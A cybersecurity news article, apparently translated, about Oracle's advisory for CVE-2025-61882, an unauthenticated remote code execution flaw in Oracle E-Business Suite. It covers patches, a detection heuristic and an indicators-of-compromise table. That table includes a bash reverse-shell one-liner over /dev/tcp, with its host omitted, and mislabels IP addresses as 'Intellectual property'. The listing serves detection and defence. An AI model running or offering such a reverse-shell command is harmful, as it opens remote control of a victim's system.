Red Hot Cyber, The cybersecurity news

Red Hot Cyber

Cybersecurity is about sharing. Recognize the risk, combat it, share your experiences, and encourage others to do better than you.
Search

Oracle E-Business Suite 9.8 Vulnerability: Urgent Updates Needed

Redazione RHC : 5 October 2025 21:29

Oracle has published a security advisory regarding a critical vulnerability identified as CVE-2025-61882 in the Oracle E-Business Suite . The flaw can be exploited remotely without authentication , potentially allowing malicious code to be executed on affected systems.

The company recommends that its customers immediately apply the updates outlined in the advisory. Oracle emphasizes the importance of maintaining actively supported product versions and installing all critical security patches promptly. In particular, updating critical patches released in October 2023 is a prerequisite for implementing new fixes.

To support immediate detection and containment of potential attacks, the alert includes a risk matrix with indicators of compromise , such as suspicious IP addresses, commands, and files associated with known exploits.

Affected products and available patches

The vulnerability specifically affects Oracle E-Business Suite versions 12.2.3 through 12.2.14 . The official documentation, available through the links provided by Oracle, contains detailed information about the patches and how to install them.

affected products and versionsPatch Availability Document
Oracle E-Business Suite, versions 12.2.3–12.2.14Oracle E-Business Suite

Legacy Support and Versions

Patches provided through the Security Alert program are available only for versions covered by Premier Support or Extended Support under Oracle’s Lifetime Support Policy.

Versions not included in these programs are not tested for reported vulnerabilities, even though they may still be affected. For this reason, Oracle recommends upgrading to supported versions to ensure protection and compatibility with security patches.

How to check if you are affected by the bug

CVE-2025-61882 affects Oracle E-Business Suite and is remotely exploitable without authentication, potentially resulting in remote code execution if successfully exploited.

A public detection method has been published on GitHub that helps identify potentially outdated instances. The method flags an instance as suspicious when the page returns the string “E-Business Suite Home Page” and the HTTP Last-Modified header reports a date before October 4, 2025 (Unix timestamp 1759602752 ).

This approach is described as a detection tool—not an attack vector —and should be used for verification and defense purposes only. To mitigate the risk, Oracle recommends applying the patches outlined in the security advisory and updating to supported versions.

Indicators of Compromise (IOC)

Below are indicators of compromise (IP addresses, observed commands, and files) to support immediate detection, investigation, and containment.

IndicatorTypeDescription
200[.]107[.]207[.]26Intellectual propertyPotential GET and POST activity
185[.]181[.]60[.]11Intellectual propertyPotential GET and POST activity
sh -c /bin/bash -i >& /dev/tcp//0>&1CommandEstablish an outgoing TCP connection on a specific port
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235dSHA 256oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121SHA 256oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1bSHA 256oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

Redazione
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.

Lista degli articoli